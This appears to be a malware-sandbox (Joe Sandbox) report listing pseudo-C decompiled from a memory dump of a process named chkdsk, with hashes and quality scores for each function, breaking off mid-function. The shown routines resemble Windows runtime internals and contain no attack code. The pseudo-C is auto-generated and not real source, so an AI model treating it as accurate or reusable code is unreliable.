                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f8a8c05b0944bfbe630d85d09aaadb9b814626d472a62a625b23d78d839652e7
                                                      • Instruction ID: 71756522b2cfc2a6cf77a18b97ca3ec4787990452f6ae088e0334ec3a68244d3
                                                      • Opcode Fuzzy Hash: f8a8c05b0944bfbe630d85d09aaadb9b814626d472a62a625b23d78d839652e7
                                                      • Instruction Fuzzy Hash: D8310232301612EBD721EF54C984B2AB7A4FF80B18F05092EE9568B240D770F804CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 74%
                                                      			E04DBE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                                                      				intOrPtr* _v0;
                                                      				signed char _v4;
                                                      				signed int _v8;
                                                      				void* __ecx;
                                                      				void* __ebp;
                                                      				void* _t37;
                                                      				intOrPtr _t38;
                                                      				signed int _t44;
                                                      				signed char _t52;
                                                      				void* _t54;
                                                      				intOrPtr* _t56;
                                                      				void* _t58;
                                                      				char* _t59;
                                                      				signed int _t62;
                                                      
                                                      				_t58 = __edx;
                                                      				_push(0);
                                                      				_push(4);
                                                      				_push( &_v8);
                                                      				_push(0x24);
                                                      				_push(0xffffffff);
                                                      				if(E04DC9670() < 0) {
                                                      					L04DDDF30(_t54, _t58, _t35);
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					_push(_t54);
                                                      					_t52 = _v4;
                                                      					if(_t52 > 8) {
                                                      						_t37 = 0xc0000078;
                                                      					} else {
                                                      						_t38 =  *0x4e77b9c; // 0x0
                                                      						_t62 = _t52 & 0x000000ff;
                                                      						_t59 = L04DA4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                                                      						if(_t59 == 0) {
                                                      							_t37 = 0xc0000017;
                                                      						} else {
                                                      							_t56 = _v0;
                                                      							 *(_t59 + 1) = _t52;
                                                      							 *_t59 = 1;
                                                      							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                                                      							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                                                      							_t44 = _t62 - 1;
                                                      							if(_t44 <= 7) {
                                                      								switch( *((intOrPtr*)(_t44 * 4 +  &M04DBE810))) {
                                                      									case 0:
                                                      										L6:
                                                      										 *((intOrPtr*)(_t59 + 8)) = _a8;
                                                      										goto L7;
                                                      									case 1:
                                                      										L13:
                                                      										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                                                      										goto L6;
                                                      									case 2:
                                                      										L12:
                                                      										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                                                      										goto L13;
                                                      									case 3:
                                                      										L11:
                                                      										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                                                      										goto L12;
                                                      									case 4:
                                                      										L10:
                                                      										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                                                      										goto L11;
                                                      									case 5:
                                                      										L9:
                                                      										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                                                      										goto L10;
                                                      									case 6:
                                                      										L17:
                                                      										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                                                      										goto L9;
                                                      									case 7:
                                                      										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                                                      										goto L17;
                                                      								}
                                                      							}
                                                      							L7:
                                                      							 *_a40 = _t59;
                                                      							_t37 = 0;
                                                      						}
                                                      					}
                                                      					return _t37;
                                                      				} else {
                                                      					_push(0x20);
                                                      					asm("ror eax, cl");
                                                      					return _a4 ^ _v8;
                                                      				}
                                                      			}

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d658e88b76cd3fed24fc421292526c85b5177b30314b9ebb66188d9457265f50
                                                      • Instruction ID: 9f0bf13e775430e6efbe01615d4bed2a9ab3cd7b8a98469d35792257f5ab73e1
                                                      • Opcode Fuzzy Hash: d658e88b76cd3fed24fc421292526c85b5177b30314b9ebb66188d9457265f50
                                                      • Instruction Fuzzy Hash: F8318CB5A14249EFD704CF28D841B9AB7E8FB08314F14829AF945CB341E631EC80CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 67%
                                                      			E04DBBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v12;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				intOrPtr _t22;
                                                      				intOrPtr* _t41;
                                                      				intOrPtr _t51;
                                                      
                                                      				_t51 =  *0x4e76100; // 0x8
                                                      				_v12 = __edx;
                                                      				_v8 = __ecx;
                                                      				if(_t51 >= 0x800) {
                                                      					L12:
                                                      					return 0;
                                                      				} else {
                                                      					goto L1;
                                                      				}
                                                      				while(1) {
                                                      					L1:
                                                      					_t22 = _t51;
                                                      					asm("lock cmpxchg [ecx], edx");
                                                      					if(_t51 == _t22) {
                                                      						break;
                                                      					}
                                                      					_t51 = _t22;
                                                      					if(_t22 < 0x800) {
                                                      						continue;
                                                      					}
                                                      					goto L12;
                                                      				}
                                                      				E04DA2280(0xd, 0x1884f1a0);
                                                      				_t41 =  *0x4e760f8; // 0x0
                                                      				if(_t41 != 0) {
                                                      					 *0x4e760f8 =  *_t41;
                                                      					 *0x4e760fc =  *0x4e760fc + 0xffff;
                                                      				}
                                                      				E04D9FFB0(_t41, 0x800, 0x1884f1a0);
                                                      				if(_t41 != 0) {
                                                      					L6:
                                                      					asm("movsd");
                                                      					asm("movsd");
                                                      					asm("movsd");
                                                      					asm("movsd");
                                                      					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                                                      					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                                                      					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                                                      					do {
                                                      						asm("lock xadd [0x4e760f0], ax");
                                                      						 *((short*)(_t41 + 0x34)) = 1;
                                                      					} while (1 == 0);
                                                      					goto L8;
                                                      				} else {
                                                      					_t41 = L04DA4620(0x4e76100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                                                      					if(_t41 == 0) {
                                                      						L11:
                                                      						asm("lock dec dword [0x4e76100]");
                                                      						L8:
                                                      						return _t41;
                                                      					}
                                                      					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                                                      					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                                                      					if(_t41 == 0) {
                                                      						goto L11;
                                                      					}
                                                      					goto L6;
                                                      				}
                                                      			}











                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5c4d6a12a3947db679a9ed006bde1f8595d7920de111fce1e9e8f376d2674ce7
                                                      • Instruction ID: f10814e9da9bb269c514ae861361703d07501540cb0857d63fdb131161a1b65c
                                                      • Opcode Fuzzy Hash: 5c4d6a12a3947db679a9ed006bde1f8595d7920de111fce1e9e8f376d2674ce7
                                                      • Instruction Fuzzy Hash: EE31DF32A00A15DBDB11DF69D4807E673A4FB18329F04457AE98AEB605E778FD058BD0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 60%
                                                      			E04DB1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                      				char _v8;
                                                      				intOrPtr _v12;
                                                      				intOrPtr _v16;
                                                      				intOrPtr* _v20;
                                                      				void* _t22;
                                                      				char _t23;
                                                      				void* _t36;
                                                      				intOrPtr _t42;
                                                      				intOrPtr _t43;
                                                      
                                                      				_v12 = __ecx;
                                                      				_t43 = 0;
                                                      				_v20 = __edx;
                                                      				_t42 =  *__edx;
                                                      				 *__edx = 0;
                                                      				_v16 = _t42;
                                                      				_push( &_v8);
                                                      				_push(0);
                                                      				_push(0);
                                                      				_push(6);
                                                      				_push(0);
                                                      				_push(__ecx);
                                                      				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
                                                      				_push(_t36);
                                                      				_t22 = E04DAF460();
                                                      				if(_t22 < 0) {
                                                      					if(_t22 == 0xc0000023) {
                                                      						goto L1;
                                                      					}
                                                      					L3:
                                                      					return _t43;
                                                      				}
                                                      				L1:
                                                      				_t23 = _v8;
                                                      				if(_t23 != 0) {
                                                      					_t38 = _a4;
                                                      					if(_t23 >  *_a4) {
                                                      						_t42 = L04DA4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
                                                      						if(_t42 == 0) {
                                                      							goto L3;
                                                      						}
                                                      						_t23 = _v8;
                                                      					}
                                                      					_push( &_v8);
                                                      					_push(_t23);
                                                      					_push(_t42);
                                                      					_push(6);
                                                      					_push(_t43);
                                                      					_push(_v12);
                                                      					_push(_t36);
                                                      					if(E04DAF460() < 0) {
                                                      						if(_t42 != 0 && _t42 != _v16) {
                                                      							L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
                                                      						}
                                                      						goto L3;
                                                      					}
                                                      					 *_v20 = _t42;
                                                      					 *_a4 = _v8;
                                                      				}
                                                      				_t43 = 1;
                                                      				goto L3;
                                                      			}













                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                      • Instruction ID: 78fa7d40dc2f2f6df0ce23ea3cd54d7c60f902c281ba068a13194408388d2d1b
                                                      • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                      • Instruction Fuzzy Hash: B1218B32A00119EFD721CF99CCA4EAEBBB9FF85684F154059E94297210DA30BE11CBE0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 76%
                                                      			E04D89100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                                                      				signed int _t53;
                                                      				signed int _t56;
                                                      				signed int* _t60;
                                                      				signed int _t63;
                                                      				signed int _t66;
                                                      				signed int _t69;
                                                      				void* _t70;
                                                      				intOrPtr* _t72;
                                                      				void* _t78;
                                                      				void* _t79;
                                                      				signed int _t80;
                                                      				intOrPtr _t82;
                                                      				void* _t85;
                                                      				void* _t88;
                                                      				void* _t89;
                                                      
                                                      				_t84 = __esi;
                                                      				_t70 = __ecx;
                                                      				_t68 = __ebx;
                                                      				_push(0x2c);
                                                      				_push(0x4e5f6e8);
                                                      				E04DDD0E8(__ebx, __edi, __esi);
                                                      				 *((char*)(_t85 - 0x1d)) = 0;
                                                      				_t82 =  *((intOrPtr*)(_t85 + 8));
                                                      				if(_t82 == 0) {
                                                      					L4:
                                                      					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                                                      						E04E588F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                                                      					}
                                                      					L5:
                                                      					return E04DDD130(_t68, _t82, _t84);
                                                      				}
                                                      				_t88 = _t82 -  *0x4e786c0; // 0x3007b0
                                                      				if(_t88 == 0) {
                                                      					goto L4;
                                                      				}
                                                      				_t89 = _t82 -  *0x4e786b8; // 0x0
                                                      				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                      					goto L4;
                                                      				} else {
                                                      					E04DA2280(_t82 + 0xe0, _t82 + 0xe0);
                                                      					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                                                      					__eflags =  *((char*)(_t82 + 0xe5));
                                                      					if(__eflags != 0) {
                                                      						E04E588F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                                                      						goto L12;
                                                      					} else {
                                                      						__eflags =  *((char*)(_t82 + 0xe4));
                                                      						if( *((char*)(_t82 + 0xe4)) == 0) {
                                                      							 *((char*)(_t82 + 0xe4)) = 1;
                                                      							_push(_t82);
                                                      							_push( *((intOrPtr*)(_t82 + 0x24)));
                                                      							E04DCAFD0();
                                                      						}
                                                      						while(1) {
                                                      							_t60 = _t82 + 8;
                                                      							 *(_t85 - 0x2c) = _t60;
                                                      							_t68 =  *_t60;
                                                      							_t80 = _t60[1];
                                                      							 *(_t85 - 0x28) = _t68;
                                                      							 *(_t85 - 0x24) = _t80;
                                                      							while(1) {
                                                      								L10:
                                                      								__eflags = _t80;
                                                      								if(_t80 == 0) {
                                                      									break;
                                                      								}
                                                      								_t84 = _t68;
                                                      								 *(_t85 - 0x30) = _t80;
                                                      								 *(_t85 - 0x24) = _t80 - 1;
                                                      								asm("lock cmpxchg8b [edi]");
                                                      								_t68 = _t84;
                                                      								 *(_t85 - 0x28) = _t68;
                                                      								 *(_t85 - 0x24) = _t80;
                                                      								__eflags = _t68 - _t84;
                                                      								_t82 =  *((intOrPtr*)(_t85 + 8));
                                                      								if(_t68 != _t84) {
                                                      									continue;
                                                      								}
                                                      								__eflags = _t80 -  *(_t85 - 0x30);
                                                      								if(_t80 !=  *(_t85 - 0x30)) {
                                                      									continue;
                                                      								}
                                                      								__eflags = _t80;
                                                      								if(_t80 == 0) {
                                                      									break;
                                                      								}
                                                      								_t63 = 0;
                                                      								 *(_t85 - 0x34) = 0;
                                                      								_t84 = 0;
                                                      								__eflags = 0;
                                                      								while(1) {
                                                      									 *(_t85 - 0x3c) = _t84;
                                                      									__eflags = _t84 - 3;
                                                      									if(_t84 >= 3) {
                                                      										break;
                                                      									}
                                                      									__eflags = _t63;
                                                      									if(_t63 != 0) {
                                                      										L40:
                                                      										_t84 =  *_t63;
                                                      										__eflags = _t84;
                                                      										if(_t84 != 0) {
                                                      											_t84 =  *(_t84 + 4);
                                                      											__eflags = _t84;
                                                      											if(_t84 != 0) {
                                                      												 *0x4e7b1e0(_t63, _t82);
                                                      												 *_t84();
                                                      											}
                                                      										}
                                                      										do {
                                                      											_t60 = _t82 + 8;
                                                      											 *(_t85 - 0x2c) = _t60;
                                                      											_t68 =  *_t60;
                                                      											_t80 = _t60[1];
                                                      											 *(_t85 - 0x28) = _t68;
                                                      											 *(_t85 - 0x24) = _t80;
                                                      											goto L10;
                                                      										} while (_t63 == 0);
                                                      										goto L40;
                                                      									}
                                                      									_t69 = 0;
                                                      									__eflags = 0;
                                                      									while(1) {
                                                      										 *(_t85 - 0x38) = _t69;
                                                      										__eflags = _t69 -  *0x4e784c0;
                                                      										if(_t69 >=  *0x4e784c0) {
                                                      											break;
                                                      										}
                                                      										__eflags = _t63;
                                                      										if(_t63 != 0) {
                                                      											break;
                                                      										}
                                                      										_t66 = E04E59063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                                                      										__eflags = _t66;
                                                      										if(_t66 == 0) {
                                                      											_t63 = 0;
                                                      											__eflags = 0;
                                                      										} else {
                                                      											_t63 = _t66 + 0xfffffff4;
                                                      										}
                                                      										 *(_t85 - 0x34) = _t63;
                                                      										_t69 = _t69 + 1;
                                                      									}
                                                      									_t84 = _t84 + 1;
                                                      								}
                                                      								__eflags = _t63;
                                                      							}
                                                      							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                                                      							 *((char*)(_t82 + 0xe5)) = 1;
                                                      							 *((char*)(_t85 - 0x1d)) = 1;
                                                      							L12:
                                                      							 *(_t85 - 4) = 0xfffffffe;
                                                      							E04D8922A(_t82);
                                                      							_t53 = E04DA7D50();
                                                      							__eflags = _t53;
                                                      							if(_t53 != 0) {
                                                      								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                      							} else {
                                                      								_t56 = 0x7ffe0386;
                                                      							}
                                                      							__eflags =  *_t56;
                                                      							if( *_t56 != 0) {
                                                      								_t56 = E04E58B58(_t82);
                                                      							}
                                                      							__eflags =  *((char*)(_t85 - 0x1d));
                                                      							if( *((char*)(_t85 - 0x1d)) != 0) {
                                                      								__eflags = _t82 -  *0x4e786c0; // 0x3007b0
                                                      								if(__eflags != 0) {
                                                      									__eflags = _t82 -  *0x4e786b8; // 0x0
                                                      									if(__eflags == 0) {
                                                      										_t79 = 0x4e786bc;
                                                      										_t72 = 0x4e786b8;
                                                      										goto L18;
                                                      									}
                                                      									__eflags = _t56 | 0xffffffff;
                                                      									asm("lock xadd [edi], eax");
                                                      									if(__eflags == 0) {
                                                      										E04D89240(_t68, _t82, _t82, _t84, __eflags);
                                                      									}
                                                      								} else {
                                                      									_t79 = 0x4e786c4;
                                                      									_t72 = 0x4e786c0;
                                                      									L18:
                                                      									E04DB9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                                                      								}
                                                      							}
                                                      							goto L5;
                                                      						}
                                                      					}
                                                      				}
                                                      			}



















                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3bbad50d6ffe3945750ddd80c5c938692895a92503d2cf530cd2109ea930ae24
                                                      • Instruction ID: bc53c7b2621804e66a1b97ea944a4548333ea1deea4837948b937181d23598d8
                                                      • Opcode Fuzzy Hash: 3bbad50d6ffe3945750ddd80c5c938692895a92503d2cf530cd2109ea930ae24
                                                      • Instruction Fuzzy Hash: 5A319DB5A04645DFEB21FFA9C098BBCBBF1BB48324F18858DC88467250D334B980CB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 53%
                                                      			E04DA0050(void* __ecx) {
                                                      				signed int _v8;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				intOrPtr* _t30;
                                                      				intOrPtr* _t31;
                                                      				signed int _t34;
                                                      				void* _t40;
                                                      				void* _t41;
                                                      				signed int _t44;
                                                      				intOrPtr _t47;
                                                      				signed int _t58;
                                                      				void* _t59;
                                                      				void* _t61;
                                                      				void* _t62;
                                                      				signed int _t64;
                                                      
                                                      				_push(__ecx);
                                                      				_v8 =  *0x4e7d360 ^ _t64;
                                                      				_t61 = __ecx;
                                                      				_t2 = _t61 + 0x20; // 0x20
                                                      				E04DB9ED0(_t2, 1, 0);
                                                      				_t52 =  *(_t61 + 0x8c);
                                                      				_t4 = _t61 + 0x8c; // 0x8c
                                                      				_t40 = _t4;
                                                      				do {
                                                      					_t44 = _t52;
                                                      					_t58 = _t52 & 0x00000001;
                                                      					_t24 = _t44;
                                                      					asm("lock cmpxchg [ebx], edx");
                                                      					_t52 = _t44;
                                                      				} while (_t52 != _t44);
                                                      				if(_t58 == 0) {
                                                      					L7:
                                                      					_pop(_t59);
                                                      					_pop(_t62);
                                                      					_pop(_t41);
                                                      					return E04DCB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                                                      				}
                                                      				asm("lock xadd [esi], eax");
                                                      				_t47 =  *[fs:0x18];
                                                      				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                                                      				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                                                      				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                      				if(_t30 != 0) {
                                                      					if( *_t30 == 0) {
                                                      						goto L4;
                                                      					}
                                                      					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                      					L5:
                                                      					if( *_t31 != 0) {
                                                      						_t18 = _t61 + 0x78; // 0x78
                                                      						E04E58A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                                                      					}
                                                      					_t52 =  *(_t61 + 0x5c);
                                                      					_t11 = _t61 + 0x78; // 0x78
                                                      					_t34 = E04DB9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                                                      					_t24 = _t34 | 0xffffffff;
                                                      					asm("lock xadd [esi], eax");
                                                      					if((_t34 | 0xffffffff) == 0) {
                                                      						 *0x4e7b1e0(_t61);
                                                      						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                                                      					}
                                                      					goto L7;
                                                      				}
                                                      				L4:
                                                      				_t31 = 0x7ffe0386;
                                                      				goto L5;
                                                      			}





















                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f4f98fd9eefa6d781288065eb46f537d7736089f63a3f3233ae69c65393e4488
                                                      • Instruction ID: 885996f2c97c59f04556a921e413b80d970132b66b7609bb4815cf51fee632ca
                                                      • Opcode Fuzzy Hash: f4f98fd9eefa6d781288065eb46f537d7736089f63a3f3233ae69c65393e4488
                                                      • Instruction Fuzzy Hash: CA317831701A04CFD722CF28C844BAAB3E5FF88718F14856DE59A87A90EA35B801CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 77%
                                                      			E04E06C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                                                      				signed short* _v8;
                                                      				signed char _v12;
                                                      				void* _t22;
                                                      				signed char* _t23;
                                                      				intOrPtr _t24;
                                                      				signed short* _t44;
                                                      				void* _t47;
                                                      				signed char* _t56;
                                                      				signed char* _t58;
                                                      
                                                      				_t48 = __ecx;
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_t44 = __ecx;
                                                      				_v12 = __edx;
                                                      				_v8 = __ecx;
                                                      				_t22 = E04DA7D50();
                                                      				_t58 = 0x7ffe0384;
                                                      				if(_t22 == 0) {
                                                      					_t23 = 0x7ffe0384;
                                                      				} else {
                                                      					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                      				}
                                                      				if( *_t23 != 0) {
                                                      					_t24 =  *0x4e77b9c; // 0x0
                                                      					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                                                      					_t23 = L04DA4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                                                      					_t56 = _t23;
                                                      					if(_t56 != 0) {
                                                      						_t56[0x24] = _a4;
                                                      						_t56[0x28] = _a8;
                                                      						_t56[6] = 0x1420;
                                                      						_t56[0x20] = _v12;
                                                      						_t14 =  &(_t56[0x2c]); // 0x2c
                                                      						E04DCF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
                                                      						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                                                      						if(E04DA7D50() != 0) {
                                                      							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                      						}
                                                      						_push(_t56);
                                                      						_push(_t47 - 0x20);
                                                      						_push(0x402);
                                                      						_push( *_t58 & 0x000000ff);
                                                      						E04DC9AE0();
                                                      						_t23 = L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                                                      					}
                                                      				}
                                                      				return _t23;
                                                      			}













                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d3554cb7ad40a1dfe9c56c03ba09156923e754b6ac9a62de94b01b2cb0c17426
                                                      • Instruction ID: e3faf43637f484a7723433995c60ffbca3630533a5d18fc025b743e55e1deb39
                                                      • Opcode Fuzzy Hash: d3554cb7ad40a1dfe9c56c03ba09156923e754b6ac9a62de94b01b2cb0c17426
                                                      • Instruction Fuzzy Hash: 10219CB1A00644AFD715DF69D880F6AB7B8FF48748F1440AAF904D7791E634ED60CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E04DC90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                                                      				intOrPtr* _v0;
                                                      				void* _v8;
                                                      				signed int _v12;
                                                      				intOrPtr _v16;
                                                      				char _v36;
                                                      				void* _t38;
                                                      				intOrPtr _t41;
                                                      				void* _t44;
                                                      				signed int _t45;
                                                      				intOrPtr* _t49;
                                                      				signed int _t57;
                                                      				signed int _t58;
                                                      				intOrPtr* _t59;
                                                      				void* _t62;
                                                      				void* _t63;
                                                      				void* _t65;
                                                      				void* _t66;
                                                      				signed int _t69;
                                                      				intOrPtr* _t70;
                                                      				void* _t71;
                                                      				intOrPtr* _t72;
                                                      				intOrPtr* _t73;
                                                      				char _t74;
                                                      
                                                      				_t65 = __edx;
                                                      				_t57 = _a4;
                                                      				_t32 = __ecx;
                                                      				_v8 = __edx;
                                                      				_t3 = _t32 + 0x14c; // 0x14c
                                                      				_t70 = _t3;
                                                      				_v16 = __ecx;
                                                      				_t72 =  *_t70;
                                                      				while(_t72 != _t70) {
                                                      					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                                                      						L24:
                                                      						_t72 =  *_t72;
                                                      						continue;
                                                      					}
                                                      					_t30 = _t72 + 0x10; // 0x10
                                                      					if(E04DDD4F0(_t30, _t65, _t57) == _t57) {
                                                      						return 0xb7;
                                                      					}
                                                      					_t65 = _v8;
                                                      					goto L24;
                                                      				}
                                                      				_t61 = _t57;
                                                      				_push( &_v12);
                                                      				_t66 = 0x10;
                                                      				if(E04DBE5E0(_t57, _t66) < 0) {
                                                      					return 0x216;
                                                      				}
                                                      				_t73 = L04DA4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                                                      				if(_t73 == 0) {
                                                      					_t38 = 0xe;
                                                      					return _t38;
                                                      				}
                                                      				_t9 = _t73 + 0x10; // 0x10
                                                      				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                                                      				E04DCF3E0(_t9, _v8, _t57);
                                                      				_t41 =  *_t70;
                                                      				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                                                      					_t62 = 3;
                                                      					asm("int 0x29");
                                                      					_push(_t62);
                                                      					_push(_t57);
                                                      					_push(_t73);
                                                      					_push(_t70);
                                                      					_t71 = _t62;
                                                      					_t74 = 0;
                                                      					_v36 = 0;
                                                      					_t63 = E04DBA2F0(_t62, _t71, 1, 6,  &_v36);
                                                      					if(_t63 == 0) {
                                                      						L20:
                                                      						_t44 = 0x57;
                                                      						return _t44;
                                                      					}
                                                      					_t45 = _v12;
                                                      					_t58 = 0x1c;
                                                      					if(_t45 < _t58) {
                                                      						goto L20;
                                                      					}
                                                      					_t69 = _t45 / _t58;
                                                      					if(_t69 == 0) {
                                                      						L19:
                                                      						return 0xe8;
                                                      					}
                                                      					_t59 = _v0;
                                                      					do {
                                                      						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                                                      							goto L18;
                                                      						}
